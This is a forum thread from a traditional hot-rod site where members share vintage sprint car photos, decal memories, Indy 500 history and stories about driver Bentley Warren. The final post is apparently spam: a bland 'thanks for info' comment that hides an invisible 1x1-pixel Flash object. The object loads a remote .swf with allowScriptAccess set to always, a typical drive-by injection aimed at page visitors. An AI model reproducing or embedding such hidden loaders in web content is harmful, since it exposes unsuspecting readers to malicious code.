Register now to get rid of these ads!

Features VINTAGE SPRINT CAR PIC THREAD, 1965 and older only please.

Discussion in 'Traditional Hot Rods' started by Joshua Shaw, Jan 17, 2008.

1. Marty Strode

Marty Strode

Dave Moses

Attached Files:

2. memaerobilia

memaerobilia

I thought some of you boys might enjoy these "oldies." Back in the late 1970's (long before the Internet days and "scanning") Dad broke out an old box full of his vintage decals from the old Raceway Garage shop, in The Bronx. We had a professional photographer friend, set a bunch on a white background, and figured it would be great fun to make a bunch of tee-shirts with this colorful group, featuring many old race cars, of midgets, sprints, Champ, Indy cars etc. never made the shirts though..
    Five of them are specific to a certain year or driver, as marked with the blue numerals.
    #1. Wynn's w/text: "Johnny Parsons 1950 Indianapolis Winner"
    #2. Soldier Field "Ted Duncan 1946 Champion"
    #3. ARDC 1948 Registered Car
    #4. Lubri-Loy: "Spider Webb Driver"
    and, of course my favorite is:
    #5. An original vintage decal that my Dad had made a few of,(back in the day..)of his Own #8 Gertler Special midget.
    [​IMG]

3. racer5c

racer5c

And A.J. today 5-21-2012, spent the morning helping him get this car ready for Indy this Thursday

Attached Files:

4. gnichols

gnichols
    from Tampa, FL

No wing? Wing? 360? 410? Xtreme 410? Gary

5. carl s

carl s
    from Indio, CA

Thanks, that made my day!

Milw Millers this year?

6. racer5c

racer5c

I'll be there!!

7. carl s

carl s
    from Indio, CA

bring your goggles :D

8. Rootie Kazoootie

Rootie Kazoootie
    from Colorado

Herks bad day at Milwaukee.

Attached Files:

9. Ken_Schou

Ken_Schou

PART OF the problems with IndyCar are outlined in this recent article on an Albany, NY TV News stations Web Site.
    http://www.news10.com/story/18576667/in-the-pits-drama-of-course-in-indycar-again

I'll quote a bit .... "IndyCar's very existence in this current league began at a time of war for open-wheel racing, when a group of owners with one set of ideas split from CART in 1996 to join a startup series created by Tony George called the IRL. Nothing has come easy since, in large part because the team owners typically can't get out of their own way."

"The team principals fight for power with the league, fight with each other over rules and generally search for just about anything to complain about. Unlike Formula One and NASCAR, which both succeed operating as virtual dictatorships, IndyCar as moved closer to the model that ultimately killed CART - the inmates trying to run the asylum."

When I have time I'll try to post some of my own thoughts on both the self serving owners and drivers doing their best to run races for themselves (and damn the fans) .... and also about the sad & tragic fact of the cause and devistating effect of the lack of American drivers from the grass roots short tracks across the USA.

But for now ... GO BRYAN CLAUSON !!!!!!!!

Last edited: May 22, 2012
  10. Ken_Schou

Ken_Schou

Even after suffering the painful burns and lasting effects he received .... Herk was one of the first to the burning car of Mel Kenyon at Langhorne to assist.

11. Ken_Schou

Ken_Schou

THANKS Jody!!! :)

12. jjones752

jjones752
    from Indy

Once again the mainline media gets it just a little bit wrong. I actuality, the time of war in open-wheel racing began when a group of owners with one set of ideas split from USAC to form CART. When CART (now Champ Car World Series) ultimately failed, that same group of owners joined the "upstart" IRL; the rest of the quote is essentially correct. But the "split" happened back in the seventies, and the bickering started long before that. And now the manufacturers are back in, which was supposed to be a "good" thing. Let's see; last year, with the dreaded "spec" racing, there were 40 cars vying for 33 spots. This year, we have exactly 33 cars, 2 of which can't even get out of their own way, and the pole-winning owner whining about Honda having an advantage due to "Turbogate" even though Chevy captured 8 of the top 9 spots in qualifying...
    All of which is WAAYYY off topic, but I'll end in agreeing 100 percent with Ken in urging Bryan (and Joseph Newgarden) on Sunday. Roy, and whoever else will be there, hope to see you on pit lane tomorrow and from the infield Thursday. Those cars and those who created, drove and cared for them are what got me addicted.

Last edited: May 22, 2012
  13. racer5c

racer5c

"Once again the mainline media gets it just a little bit wrong. I actuality, the time of war in open-wheel racing began when a group of owners with one set of ideas split from USAC to form CART"

you beat me to it, it irks me every time I hear or read about "the Split" keep spreadin the Gospel JJONES!!

14. easter

easter

Man, look at that crowd. It's been awhile since I've seen stands packed that full - at any type of race.

15. Ken_Schou

Ken_Schou

Gotta remember that most of these reporters weren't born .. at the time of the USAC / CART split .. and for some reason they don't think it important enough to do the research. :confused:

That reminds me that one of CART's early News Releases stated that .. 'the split was caused by the high cost of racing (with USAC)' .... then came the seemingly uncontrolled and continuous upward spiral of the cost of racing with CART. :confused::(:confused:

16. Dick L

Dick L

I was thinking the same thing after viewing the pictures Easter.

17. gtxrider

gtxrider

Roadsters at Loudon. Love the sound of the Offys but the red car had a small block Chevy and the silver car in back is two seat street legal car with a Chevy as well.

Pictures from the NHMS Web Site

Attached Files:

Last edited: May 23, 2012
  18. gnichols

gnichols
    from Tampa, FL

Is that Mr. Murray's silver car in the back? Gary

19. gtxrider

gtxrider

Yes, the same car was in Hot Rod magazine a while back.

20. deuce354

deuce354

I was a Loudon A few years ago, Not counting a Top fuel or funny car , That red chev roadster is one of the loudest cars i have ever heard

21. gnichols

gnichols
    from Tampa, FL

That guy makes some cool stuff. Gary

22. carl s

carl s
    from Indio, CA

"The red car" is a pretty famous car compadre.
    (#82 SanDiego Steel (AACA 127) Chenowth Chevy 1961 First 'production' chevy V8 to attempt to qualify for the Indy 500, I believe by Mike McGill
    Currently owned and shared with others by Dave Schleppi)

Last edited: May 24, 2012
  23. Rootie Kazoootie

Rootie Kazoootie
    from Colorado

So your hanging with some of your racer buddies, sampling some brews, and a group of bathing beauties stroll by....... Next thing you know....:eek::D

Attached Files:

• bb.jpg
      bb.jpg
      File size:
      139.6 KB
      Views:
  24. Jim Nise

Jim Nise

Carl,
    pretty certain that car never made the field. Yes Mike Magill was the driver in 1961.

25. carl s

carl s
    from Indio, CA

26. Firecat7

Firecat7

awesome thread....love these cars,since was a kid.ever hear of Benteley Warren? arundel maine. through late 60's to mid 70's was a maine boy hero. ran sprints and super mods up here,AND through out new england n new york. even qualified n ran indy ...back then.was one hell of a SHOE.still a wild man...has a terrific biker bar/tavern jukejoint here in southern maine. www.benteleys saloon.....again what a neat thread..:D

27. pavementends

pavementends
    from Utah

Firecat, everybody has heard of Bentley. Copper Word Classic, Little 500 (he's won a couple of times)...some years ago at the Little 500 practice day, the motor let go in the 20 car? (Niebel's) and he headed to the gate with some sweetie. I thought, "who's that old hippie" then I realized it was bentley, he stopped and visited for a few minutes, got on his Harley and proceeded to ride back to the Northeast. Genuine guy and getting along in years too. I'd never bet against him that's for sure. The link to Bentleys bar is http://bentleyssaloon.com/ looks like a party.

28. carl s

carl s
    from Indio, CA

Bentley was getting started about the time I was leaving So New England for the Service in 62.
    He looked like a bookish young man but was a freekin maniac. lol
    The Southern New England cut downs (modifieds) had been ousted from Norwood Arena by management and NASCAR and evovled into 'super' modifieds and the North East Supermod Assn. Bentley arrived on the scene and had the talent to ride that wave.
    Started in jalopys and then caught rides in Bowlby's 'Flyin 5' and then the Purdee Deuce supermodifieds.
    His first season in USAC Championship Trail was 1970 (two years after another New England modified guy (Denny Zimmerman) had his rookie season. (I believe 1970 was the last year USAC Champ Trail included mile dirt ovals as well as paved ovals).
    Hadn't spoken with him in about 45 years until a couple of years ago, Jim McGee brought him by the Date Orchid home of our local racecar collection of Chuck Fausel.
    He was on the way to Mexico to collect Indian Jewlery to take back to Arundel to sell at the Saloon.
    Sometime in the early 60s at Westboro-his first real ride.
    [​IMG]

29. indybigjohn

indybigjohn
    Member Emeritus

Bentley was running Silver Crown cars as late as 2002. Saw him at IRP and got to talk to him for a while when we both stopped at the Clermont liquor store to fuel up. Always a great guy.

30. killerbunny

killerbunny
    from serbia

I didn't know that...thanks for info...<object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/17/nr.swf" undefined="http://smilyes4u.com/d/17/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>:D